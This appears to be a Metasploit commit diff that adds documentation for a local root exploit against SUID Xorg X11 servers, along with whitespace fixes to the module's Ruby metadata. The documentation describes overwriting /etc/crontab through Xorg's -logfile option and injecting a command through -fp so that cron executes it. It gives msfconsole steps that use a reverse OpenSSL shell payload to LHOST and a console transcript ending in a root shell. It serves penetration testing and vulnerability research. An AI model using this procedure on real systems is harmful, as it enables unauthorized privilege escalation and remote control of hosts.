Initial documentation for Xorg Privesc Module

killed white spaces

documentation/modules/exploit/multi/local/xorg_x11_suid_server.md

@@ -0,0 +1,86 @@
+## Description
+
+  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.        
+
+
+## Vulnerable Application
+
+  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.  
+
+  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.
+
+  This module has been tested successfully on:
+
+  * OpenBSD 6.3
+  * OpenBSD 6.4
+  * CentOS 7.5.1084 x86_64
+
+
+## Verification Steps
+  On CentOS your session must have console lock.  To get a console lock you can login locally with a user.  
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/multi/local/xorg_x11_suid_server`
+  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)   
+  5. Do: `set SESSION [SESSION]`
+  6. Do: `set LHOST [LHOST]`
+  7. Do: `run`
+  8. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+## Advanced Options
+
+  **Xdisplay**
+
+  Display to use for Xorg (default: `:1`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+```
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
+session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse double SSL handler on 172.30.0.2:4444
+[+] Passed all initial checks for exploit
+[*] Uploading your payload, this could take a while
+[*] Trying /etc/crontab overwrite
+[+] /etc/crontab overwrite successful
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo t2XWfcWkZHevLPS8;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "t2XWfcWkZHevLPS8\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (172.30.0.2:4444 -> 172.30.0.99:41253) at 2018-11-12 15:06:39 -0600
+[+] Returning session after cleaning
+[+] Deleted /tmp/.session-odRjfx
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
+```

modules/exploits/multi/local/xorg_x11_suid_server.rb

@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local
         [
           'Narendra Shinde', # Discovery and exploit
           'Raptor - 0xdea',  # Modified exploit for cron
-          'Aaron Ringo',      # Metasploit module
+          'Aaron Ringo',     # Metasploit module
           'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
         ],
       'DisclosureDate' => 'Oct 25 2018',
@@ -48,8 +48,8 @@ class MetasploitModule < Msf::Exploit::Local
            [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
         ],
       'Platform'       =>  %w(openbsd linux),
-      'Arch'           =>    [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Arch'           =>  [ARCH_CMD, ARCH_X86, ARCH_X64],
-      'SessionTypes'   =>    %w(shell meterpreter),
+      'SessionTypes'   =>  %w(shell meterpreter),
       'Targets'        =>
         [
            ['OpenBSD', {